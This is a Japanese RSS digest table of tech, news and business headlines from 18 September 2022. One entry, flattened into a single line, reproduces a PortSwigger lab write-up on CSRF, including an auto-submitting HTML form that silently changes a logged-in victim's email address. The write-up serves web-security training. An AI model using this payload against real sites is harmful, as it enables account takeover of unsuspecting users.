投稿時間:2022-09-18 05:14:44 RSSフィード2022-09-18 05:00 分まとめ(17件)

カテゴリー等	サイト名等	記事タイトル・トレンドワード等	リンクURL	頻出ワード・要約等/検索ボリューム	登録日
python	Pythonタグが付けられた新着投稿 - Qiita	[Switchbot API v1.1が登場] Smart Lockを遠隔操作する	https://qiita.com/masaki12-s/items/0295a96fd5a70442f7d5	smartlock	2022-09-18 04:30:44
海外TECH	MakeUseOf	How to Prevent Users from Changing Account Passwords on Windows	https://www.makeuseof.com/windows-prevent-account-password-change/	windows	2022-09-17 19:16:13
海外TECH	DEV Community	Portswigger’s Lab write up: CSRF vulnerability with no defenses	https://dev.to/christianpaez/portswiggers-lab-write-up-csrf-vulnerability-with-no-defenses-4p84	Portswigger s Lab write up CSRF vulnerability with no defensesIn this apprentice level lab we will exploit a site that contains a CSRF vulnerability in its email change functionality After signing in  and trying to update our account s email to something like test gmail com we can see the following request in the Network tab of our browser or Burpsuite Intercept POST my account change email HTTP Host aadaaecfabebb web security academy net lt User Agent Mozilla Windows NT Win x rv Gecko Firefox Accept text html application xhtml xml application xml q image avif image webp q Accept Language es ES es q en US q en q Accept Encoding gzip deflate brContent Type application x www form urlencodedContent Length Origin lt gt lt Connection keep aliveReferer lt lt Cookie session bQKVomOrYfeVTufXKAwzlJQDsUUKUpgrade Insecure Requests Sec Fetch Dest documentSec Fetch Mode navigateSec Fetch Site same originSec Fetch User With the following body structure email test gmail comHere we are able to identify that the update email action just requires a session cookie to authorize the user and the email parameter to execute this action Let s use the reading material s HTML template for CSRF to build our attack lt html gt lt body gt lt form action lt method POST gt lt input type hidden name email value pwned evil user net gt lt form gt lt script gt document forms submit lt script gt lt body gt lt html gt All we need to do is replace the action attribute of the form component to our lab s absolute email update endpoint you can see it on the POST request we performed earlier and the value attribute of the email input to whatever value we want the victim s email to change to lt html gt lt body gt lt form action LAB URL my account change email method POST gt lt input type hidden name email value attacker gmail com gt lt form gt lt script gt document forms submit lt script gt lt body gt lt html gt If we save this as an HTML file when someone visits our site the form above will be submitted as soon as the page loads and an email update will be requested as long as the user is authenticated on the lab s site since a session cookie is required to perform the email update action To solve the lab we have to go to the exploit server store our HTML code and send it to the victim	2022-09-17 19:27:04
ニュース	BBC News - Home	William and Harry lead historic coffin vigil	https://www.bbc.co.uk/news/uk-62938463?at_medium=RSS&at_campaign=KARANGA	military	2022-09-17 19:04:04
ニュース	BBC News - Home	Tottenham Hotspur 6-2 Leicester City: Son Heung-min ends barren start with 13-minute hat-trick	https://www.bbc.co.uk/sport/football/62859265?at_medium=RSS&at_campaign=KARANGA	Tottenham Hotspur Leicester City Son Heung min ends barren start with minute hat trickSon Heung min comes off bench and ends his goal drought with a minute hat trick as Tottenham punish Leicester s latest defensive horror show	2022-09-17 19:17:34
ビジネス	ダイヤモンド・オンライン - 新着記事	頭がいい子の親が「習い事」を大切にする理由 - わが子が伸びる！子育て百科	https://diamond.jp/articles/-/308292	逆効果	2022-09-18 04:55:00
ビジネス	ダイヤモンド・オンライン - 新着記事	韓国サムスンで10年働いた研究者は見た、すぐクビになる日本人と生き残る日本人の差【見逃し配信】 - 見逃し配信	https://diamond.jp/articles/-/309960	韓国	2022-09-18 04:50:00
ビジネス	ダイヤモンド・オンライン - 新着記事	「人命と利益どちらが大事か」稲盛和夫氏がJAL再建中に放った納得の回答 - 「超一流」の流儀	https://diamond.jp/articles/-/309651	日本航空	2022-09-18 04:45:00
ビジネス	ダイヤモンド・オンライン - 新着記事	元内閣府の官僚が経験した「ブラックな組織」の実態、倒れる前に実践すべき“組織サバイバル術”とは - from AERAdot.	https://diamond.jp/articles/-/309770	元内閣府の官僚が経験した「ブラックな組織」の実態、倒れる前に実践すべき“組織サバイバル術とはfromAERAdot仕事にやりがいを感じていている人でも、労働環境がブラックな人でも、転職を考えている人の多くは「人間関係」に悩み、それを主な転職理由としています。	2022-09-18 04:35:00
ビジネス	ダイヤモンド・オンライン - 新着記事	腰痛を和らげる「腰回りの自重筋トレ」5選、効果的な姿勢と回数は？ - 男のオフビジネス	https://diamond.jp/articles/-/309761	軽減	2022-09-18 04:30:00
ビジネス	ダイヤモンド・オンライン - 新着記事	福岡～タイ・バンコクに片道1万円台で行けるLCC「ベトジェットエア」とは？ - 地球の歩き方ニュース＆レポート	https://diamond.jp/articles/-/309704	地球の歩き方	2022-09-18 04:25:00
ビジネス	ダイヤモンド・オンライン - 新着記事	新日本酒紀行「北の錦」 - 新日本酒紀行	https://diamond.jp/articles/-/308886	新日本酒紀行「北の錦」新日本酒紀行令和に入り、からに酒蔵が増えた北海道。	2022-09-18 04:20:00
ビジネス	ダイヤモンド・オンライン - 新着記事	ステロイド薬の長期間使用で「脳の構造が変化」の可能性、研究結果の詳細は？ - ヘルスデーニュース	https://diamond.jp/articles/-/309772	bmjopen	2022-09-18 04:15:00
ビジネス	ダイヤモンド・オンライン - 新着記事	【4300億円の寄付で話題！パタゴニア創業者が語る】部下から信頼される「理想の管理職」の特徴とは？ - 社員をサーフィンに行かせよう	https://diamond.jp/articles/-/309975	環境保護団体	2022-09-18 04:12:00
ビジネス	ダイヤモンド・オンライン - 新着記事	「なるべく話しかけたくない」と嫌われてしまう人の特徴・ワースト1 - 「人の上に立つ」ために本当に大切なこと	https://diamond.jp/articles/-/309085	大切なこと	2022-09-18 04:10:00
ビジネス	ダイヤモンド・オンライン - 新着記事	貴重なお金を減らさないために、資産運用で最も大事なこととは？ - 最新版つみたてNISAはこの9本から選びなさい	https://diamond.jp/articles/-/309832		2022-09-18 04:05:00
ビジネス	東洋経済オンライン	銀座線｢季節外れ｣ダイヤ改正で混雑どうなった？ 8月末ダイヤ改正で1時間18本が12本に減便 | 通勤電車 | 東洋経済オンライン	https://toyokeizai.net/articles/-/619085?utm_source=rss&utm_medium=http&utm_campaign=link_back	季節外れ	2022-09-18 04:30:00